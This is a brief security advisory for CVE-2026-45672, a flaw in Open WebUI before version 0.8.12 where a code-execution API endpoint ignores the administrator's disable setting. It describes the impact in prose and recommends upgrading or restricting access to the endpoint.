CVE-2026-45672

Name of the Vulnerable Software and Affected Versions Open WebUI versions prior to 0.8.12

Description Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. A flaw exists where the '/api/v1/utils/code/execute' endpoint allows any verified user to execute arbitrary Python code via Jupyter, even when the administrator has set the ENABLE CODE EXECUTION variable to false. The feature gate is not enforced on the API endpoint, meaning the configuration indicates the feature is disabled while code execution remains possible. This allows authenticated users to execute arbitrary code within the Jupyter container, potentially leading to the reading of files, spawning of processes, and network access to internal Docker services, which can be used as a Server-Side Request Forgery (SSRF) vector to exfiltrate data from internal services.

Recommendations Update to version 0.8.12 or later. As a temporary workaround, restrict access to the '/api/v1/utils/code/execute' endpoint to minimize the risk of exploitation.